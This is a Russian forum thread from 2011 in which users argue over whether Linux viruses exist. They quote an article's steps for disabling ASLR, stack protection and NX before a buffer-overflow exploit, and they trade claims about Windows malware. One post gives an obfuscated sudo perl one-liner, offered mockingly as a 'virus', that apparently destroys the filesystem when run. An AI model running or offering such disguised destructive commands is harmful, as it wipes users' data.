В продолжение про безопасность в линухе.

pavel2403 · 05-07-11 22:38:00

Здесь часто очень многие упоротые на все возрвжения сторонников винды недоуменно кричали: Вы говорите, что вирусы под линух могут быть? -Так покажите их нам. В этой теме не только показывается но и рассказывается популярно как написать вирус для линуха. Курите луноходы! Сага о безопасности линуха в 3-х частях.
www.securitylab.ru/analytics/406154.php

Добавлено спустя 01 мин 30 с:
Ну и в догонку: www.securitylab.ru/news/406197.php

Отредактировано pavel2403 (05-07-11 22:44:06)

Linups_Troolvalds · 05-07-11 22:43:28

pavel2403 пишет:

В этой теме не только показывается но и рассказывается популярно как написать вирус для линуха.

Так напишите же, ну чего вам стоит...

pavel2403 пишет:

Ну и в догонку

Да-да, бэкдор это очень вирус. Настолько вирус, что вообще к теме не относится.

pavel2403 · 05-07-11 22:46:02

Linups_Troolvalds пишет:

Так напишите же, ну чего вам стоит...

Судя по скорости ответа ты даже не читал, а сразу же начал вопить как в жопу раненая рысь. Почитай- может поумнеешь.
К слову, я не пишу под линухом и для линуха, у меня более важная работа, чем ковырять ваше дерьмо.

Linups_Troolvalds пишет:

Да-да, бэкдор это очень вирус. Настолько вирус, что вообще к теме не относится.

Не придирайся к словам, это в продолжение про безопасность, о взломе репозитория была тема, она видимо вечная. big_smile

Отредактировано pavel2403 (05-07-11 22:48:42)

ikkunan salvataja · 05-07-11 22:50:34

pavel2403 пишет:

Я не пишу под линухом и для линуха

А жаль, видимо работоспособного вируса под линукс мы так и не дождёмся. Вон Дохтур тоже слился.

Linups_Troolvalds · 05-07-11 22:52:15

pavel2403 пишет:

Судя по скорости ответа ты даже не читал, а сразу же начал вопить как в жопу раненая рысь.

Нет, я просто читал это раньше вас.

pavel2403 пишет:

К слову, я не пишу под линухом и для линуха, у меня более важная работа, чем ковырять ваше дерьмо.

Разумеется. Засчитан.

pavel2403 · 05-07-11 23:16:04

Linups_Troolvalds пишет:

Нет, я просто читал это раньше вас.

Ага, только не понял ни одной буквы, как же.

Linups_Troolvalds пишет:

Разумеется. Засчитан.

Ты можешь считать все что угодно и как угодно, твои намеки были бы справедливы, если бы ты сам предложил общественности собственно ручно написаный вирус или хотя бы эксплойт для винды. Так нет же, клаву-то топтать легче, и вопить: "Напигите нам вирус!". Вот тут тебе руководство к действию- бери и пиши. а то как был клоуном так им и остался. big_smile

Linups_Troolvalds · 05-07-11 23:29:02

pavel2403 пишет:

Ага, только не понял ни одной буквы, как же.

Вообще вы почти правы, я «не понял ни одной буквы» в том, какое отношение имеет запуск эксплойтов под рутом к вирусам.

pavel2403 пишет:

твои намеки были бы справедливы, если бы ты сам предложил общественности собственно ручно написаный вирус или хотя бы эксплойт для винды

Зачем собственноручно писать, если они и так есть, причем не proof-of-concept, а массово распространяемые?
Нет уж, вирусы для винды – это объективный факт, а вирусы для линукса – теоретические рассуждения. Бэкдоры, эксплойты, трояны – да, вполне реально, эффективно будет, если параметры целевой системы заранее известны, а ее уровень защищенности низок.

Babusha · 05-07-11 23:40:16

Я конечно с этой темой мало знаком, но разве нельзя методом переполнения буфера получить доступ к машине, где там уже распространять вирус?

spoilt · 06-07-11 00:21:49

Сегодня неделя мифических "вирусов" и эксплойтов?

pavel2403 пишет:

www.securitylab.ru/analytics/406154.php

Интересная статья, однако за готовый эксплойт это явно не сойдет, компилять, ковырять нужно, да еще и gcc не устанавливается по дефолту в Deiban.

Babusha пишет:

Я конечно с этой темой мало знаком, но разве нельзя методом переполнения буфера получить доступ к машине, где там уже распространять вирус?

Можно, собственно в статье (насколько я понял) эксплоит совмещен с руткитом, может принимать команды извне.

Babusha · 06-07-11 00:38:49

spoilt пишет:

Можно, собственно в статье (насколько я понял) эксплоит совмещен с руткитом, может принимать команды извне.

Ну как я понимаю, программа по идее не может "читать" память другого приложения, способом переполнения буфера программе удается "прочитать" память другого приложения, которое может выполняться от срута, т.е можно вставить произвольный код который будет работать от срута, я все правильно понимаю? Поправьте, есличо, а ынтэресно, же.

spoilt · 06-07-11 01:12:33

Babusha пишет:

программа по идее не может "читать" память другого приложения

Читать может (так как находятся в одном кольце).

Babusha пишет:

т.е можно вставить произвольный код который будет работать от срута, я все правильно понимаю?

В общем-то да. Переполнение буфера позволяет по-хитрому заменить небольшой участок памяти приложения. Само по себе переполнение буфера - это ошибка при работе с данными, которая может вылиться в такие сюрпризы как отказ в обслуживании (DoS) или удаленное выполнение кода.
Переполнению буфера в той или иной степени подвержены практически все программы написанные на языках с ручным управлением памятью (С/С++ и тд), а так как на них написаны практически все ОС и большая часть софта, то нечего удивляться.

Белая рысь · 06-07-11 02:50:58

pavel2403 пишет:

а сразу же начал вопить как в жопу раненая рысь

Нунифигасебеприколы. О.о Рысей не трогать, а орал он - как Завулон в лифте(с)

Linups_Troolvalds пишет:

Зачем собственноручно писать, если они и так есть, причем не proof-of-concept, а массово распространяемые?

Пруф или поздравить соврамши? Я сижу под семёркой, где бы мне вирусочек поиметь? Или щас опять ссылки на кучи vkhacker'ов полетят, которые трояны бай дизайн?.. Вы, господа линуксоиды, тоже теоретизировать о стопицотнях вирусов под винду готовы до упаду.

ikkunan salvataja пишет:

А жаль, видимо работоспособного вируса под линукс мы так и не дождёмся.

Думаю, Вы понимаете, что методы, используемые для защиты от вирусов, сложно отнести к преимуществам ОС. Хотя какая вам там разница... Нет вирусов - и ладно. smile

Отредактировано Белая рысь (06-07-11 02:53:13)

Linups_Troolvalds · 06-07-11 03:41:29

Белая рысь пишет:

Пруф или поздравить соврамши?

TDL-4, хотя многие пока сидят таки на XP, заметьте. Я надеюсь, вы понимаете, что вирмейкеры (да, если ЭТО можно вообще назвать вирмейкерами, конечно) еще более заинтересуются 7-й виндой, когда на ней большинство будет сидеть?

Белая рысь · 06-07-11 07:47:55

Linups_Troolvalds пишет:

TDL-4

Где я могу его он может меня поиметь? Или традиционные страшилки с теоретическими изысканиями?

Linups_Troolvalds пишет:

Я надеюсь, вы понимаете, что вирмейкеры (да, если ЭТО можно вообще назвать вирмейкерами, конечно) еще более заинтересуются 7-й виндой, когда на ней большинство будет сидеть?

big_smile Значит, когда 1% линукса, побитый на десяток бинарно несовместимых дистров - это безопасность. А когда семёрка, уже побившая 15% рубеж (инфа из непроснувшегося мозга, может не соответствовать истине!!!) - это ещё мало народу. Линукслогика на марше.

MOP3E · 06-07-11 08:39:59

Linups_Troolvalds пишет:

Я надеюсь, вы понимаете, что вирмейкеры (да, если ЭТО можно вообще назвать вирмейкерами, конечно) еще более заинтересуются 7-й виндой, когда на ней большинство будет сидеть?

Ыыыы! По разным статистикам Windows 7 установлена, как минимум, на 27% компьютеров. Это значит, что каждый четвёртый компьютер в мире гарантированно работает под управлением Windows 7. Более, чем достаточная инсталляционная база для вирусов, которых... практически нет! Хотя для ведроеда, с трудом преодолевшего планку в 0,13%, стремительно растёт количество вредоносных программ.

Keeper · 06-07-11 09:28:56

MOP3E пишет:

которых... практически нет!

Вот не надо ляля. За эти полгода у меня перебывало около 150 ноутбуков с установленной семеркой, и в каждом из них приходилось вычищать зоопарк.

pavel2403 пишет:

как написать вирус для линуха

Так напиши! Или на форуме строчить, не код писать?

Белая рысь · 06-07-11 10:48:09

Keeper пишет:

За эти полгода у меня перебывало около 150 ноутбуков с установленной семеркой, и в каждом из них приходилось вычищать зоопарк.

Пруф, что это вирусы, или нутыпонел.пнг

Keeper пишет:

Так напиши! Или на форуме строчить, не код писать?

sudo perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'
Что? Ах, рута просит? А что Вы нам тогда свой зоопарк суёте? Он тоже повышения прав просил, дали же...

дохтур · 06-07-11 10:58:14

Keeper пишет:

Вот не надо ляля. За эти полгода у меня перебывало около 150 ноутбуков с установленной семеркой, и в каждом из них приходилось вычищать зоопарк.

Жуть yikes Или работа такая? wink

Keeper · 06-07-11 11:10:34

Белая рысь пишет:

Пруф, что это вирусы, или нутыпонел.пнг

Отключи на семерке ферволы и удали антивирусник.

Белая рысь пишет:

Что? Ах, рута просит? А что Вы нам тогда свой зоопарк суёте? Он тоже повышения прав просил, дали же...

Поток сознания?

дохтур пишет:

Жуть Или работа такая?

Дохтур, ты давай пиши-пиши. Как раз пруф хорошо так описывает, твои потуги с 700к рублями.

Отредактировано Keeper (06-07-11 11:41:00)

Mazzy · 06-07-11 11:51:51

pavel2403, Пашок, меня уже первые строки убили big_smile

Перед тем, как приступить к работе, необходимо отключить “Linux ASLR”. Это можно сделать путем передачи целого значения в /proc/sys/kernel/randomize_va_space

Для этого нам придется отключить некоторые механизмы безопасности.
Давайте посмотрим, что случится, если осуществить обычную компиляцию, загрузить код в отладчик и попытаться вызвать переполнение буфера.
Дело в том, что gcc версий 3.x и 4.x выполняет компиляцию кода с использованием механизма SSP (Stack-smashing protection). SSP используется для обнаружения переполнения буфера до выполнения вредоносного кода.

Пашка, что там читать?

Добавлено спустя 01 мин 53 с:
Народ рассуждает о написании вирусов, мимолетом заявляя, что "конечно, нужно отключить все механизмы безопасности, дабы обеспечить работу вируса".

Добавлено спустя 06 мин 08 с:

Теперь необходимо отключить в Makefile функционал NX, для этого добавим флаг “-z execstack”:

Все, аминь! Отключили все, можно писать эксплоит.

Linups_Troolvalds · 06-07-11 13:06:50

Белая рысь пишет:

Или традиционные страшилки с теоретическими изысканиями?

Традиционные страшилки про теоретические 4,5 млн. компьютеров в теоретическом ботнете за первые 3 месяца 2011 года от известных сказочников на securelist.com

Белая рысь пишет:

Значит, когда 1% линукса, побитый на десяток бинарно несовместимых дистров - это безопасность.

Нет, «бинарная несовместимость» – это 4.2, вероятно, происходящее от отсутствия достаточных знаний о данной ОС.
А про безопасность я тут ничего не говорил. Лишь про отсутствие вирусов для линукса на данный момент.

Белая рысь пишет:

А когда семёрка, уже побившая 15% рубеж (инфа из непроснувшегося мозга, может не соответствовать истине!!!) - это ещё мало народу.

Как ни странно, но рубеж били прежде всего организованными миграциями в корпоративной среде. Где как бы за безопасность отвечает не дикий виндеец у себя дома, а специально обученный персонал.

Гареев Станислав · 06-07-11 13:18:31

Mazzy пишет:

Народ рассуждает о написании вирусов, мимолетом заявляя, что "конечно, нужно отключить все механизмы безопасности, дабы обеспечить работу вируса".

Жалко что вирусы не работают нормально без прав рута, а как вирусу делегировать права?

spoilt · 06-07-11 14:08:31

Белая рысь пишет:

Пруф, что это вирусы, или нутыпонел.пнг

Стоит напомнить, что вирус - это злонамеренное ПО, которое может размножаться. Преодоление защиты - это уже называется эксплойтом.
Кстати, еще недавно я умудрился заразить Windows 7 x64 вирусом (настоящим вирусом) еще 2003-2006 годов выпуска. Просто откопал старый диск с игрой и забыл, что там был тот самый вирус. Кстати это был вот этот вирус и особых последствий после него нет, а ведь мог бы выпасть и злобный Sality...

Отредактировано spoilt (06-07-11 14:09:24)

Белая рысь · 06-07-11 20:27:44

Keeper пишет:

Белая рысь пишет:
Пруф, что это вирусы, или нутыпонел.пнг
Отключи на семерке ферволы и удали антивирусник.

Та-а-ак... И что дальше? Зайти под админом и отключить уак, а потом под этим же админом валить на порносайты? Об этом вы можете поговорить с Mazzy, он очень хорошо про отключение систем безопасности написал. BTW, файрволл у меня и так отключен, а вместо антивируса - MSE, взятый из нашего аналога репозитория. Так куда мне идти за вирусом?

Linups_Troolvalds пишет:

Белая рысь пишет:
Или традиционные страшилки с теоретическими изысканиями?
Традиционные страшилки про теоретические 4,5 млн. компьютеров в теоретическом ботнете за первые 3 месяца 2011 года от известных сказочников на securelist.com
Белая рысь пишет:
Значит, когда 1% линукса, побитый на десяток бинарно несовместимых дистров - это безопасность.
Нет, «бинарная несовместимость» – это 4.2, вероятно, происходящее от отсутствия достаточных знаний о данной ОС.
А про безопасность я тут ничего не говорил. Лишь про отсутствие вирусов для линукса на данный момент.
Белая рысь пишет:
А когда семёрка, уже побившая 15% рубеж (инфа из непроснувшегося мозга, может не соответствовать истине!!!) - это ещё мало народу.
Как ни странно, но рубеж били прежде всего организованными миграциями в корпоративной среде. Где как бы за безопасность отвечает не дикий виндеец у себя дома, а специально обученный персонал.

1. Где на написано, что это именно самораспространяющиеся малвари, а не очередные vkhacker'ы и "вирус Талибан"? А то где-то на секурлисте и про линух что-то проскакивало... Не смотря на его недостаточный даже по сравнению с семеркой процент распространения...
2. Про 4.2 - не знаю, надо потестить, но ставить кучу дистров мне лень. Поверю на слово.
3. А какая вирусу-то разница? О.о Или мы опять скатились к примитивным троянам вида "а дай-ка мне прав, а то я никак в папку виндузе ничего записать не могу"... Ну, толсто же. Тот же конфикер организациям тоже изрядно нервов потрепал.

spoilt пишет:

Белая рысь пишет:
Пруф, что это вирусы, или нутыпонел.пнг
Стоит напомнить, что вирус - это злонамеренное ПО, которое может размножаться. Преодоление защиты - это уже называется эксплойтом.
Кстати, еще недавно я умудрился заразить Windows 7 x64 вирусом (настоящим вирусом) еще 2003-2006 годов выпуска. Просто откопал старый диск с игрой и забыл, что там был тот самый вирус. Кстати это был вот этот вирус и особых последствий после него нет, а ведь мог бы выпасть и злобный Sality...

Во-первых. Можно и не эксплойтом, но так, чтобы я про это не знал. Во-вторых, Вы игрушку от админа и без антивиря ставили? ССЗБ.

ЗЫЖ С мобильника постить - геморрой.

Отредактировано Белая рысь (06-07-11 20:30:47)

spoilt · 06-07-11 21:06:14

Белая рысь пишет:

Во-первых. Можно и не эксплойтом, но так, чтобы я про это не знал.

Можно. Просто заразить тот же самый файл exe, а остальное вы сделаете своими руками. Если нет антивирусного монитора, то пиши пропало.

Белая рысь пишет:

Во-вторых, Вы игрушку от админа и без антивиря ставили? ССЗБ.

Из обычного пользователя под Windows 7. Конечно же потребовалось повысить привилегии, так как игра тоже очень старая. Антивирус стоял - Comodo, но он начал вопить только когда Jeefo полез заражать системные файлы. Кстати, Comodo те еще дрова, даже вылечить не смог, пришлось CureIT качать.

Форум StopLinux

Объявление

#1 05-07-11 22:38:00

В продолжение про безопасность в линухе.

#2 05-07-11 22:43:28

Re: В продолжение про безопасность в линухе.

#3 05-07-11 22:46:02

Re: В продолжение про безопасность в линухе.

#4 05-07-11 22:50:34

Re: В продолжение про безопасность в линухе.

#5 05-07-11 22:52:15

Re: В продолжение про безопасность в линухе.

#6 05-07-11 23:16:04

Re: В продолжение про безопасность в линухе.

#7 05-07-11 23:29:02

Re: В продолжение про безопасность в линухе.

#8 05-07-11 23:40:16

Re: В продолжение про безопасность в линухе.

#9 06-07-11 00:21:49

Re: В продолжение про безопасность в линухе.

#10 06-07-11 00:38:49

Re: В продолжение про безопасность в линухе.

#11 06-07-11 01:12:33

Re: В продолжение про безопасность в линухе.

#12 06-07-11 02:50:58

Re: В продолжение про безопасность в линухе.

#13 06-07-11 03:41:29

Re: В продолжение про безопасность в линухе.

#14 06-07-11 07:47:55

Re: В продолжение про безопасность в линухе.

#15 06-07-11 08:39:59

Re: В продолжение про безопасность в линухе.

#16 06-07-11 09:28:56

Re: В продолжение про безопасность в линухе.

#17 06-07-11 10:48:09

Re: В продолжение про безопасность в линухе.

#18 06-07-11 10:58:14

Re: В продолжение про безопасность в линухе.

#19 06-07-11 11:10:34

Re: В продолжение про безопасность в линухе.

#20 06-07-11 11:51:51

Re: В продолжение про безопасность в линухе.

#21 06-07-11 13:06:50

Re: В продолжение про безопасность в линухе.

#22 06-07-11 13:18:31

Re: В продолжение про безопасность в линухе.

#23 06-07-11 14:08:31

Re: В продолжение про безопасность в линухе.

#24 06-07-11 20:27:44

Re: В продолжение про безопасность в линухе.

#25 06-07-11 21:06:14

Re: В продолжение про безопасность в линухе.

Подвал форума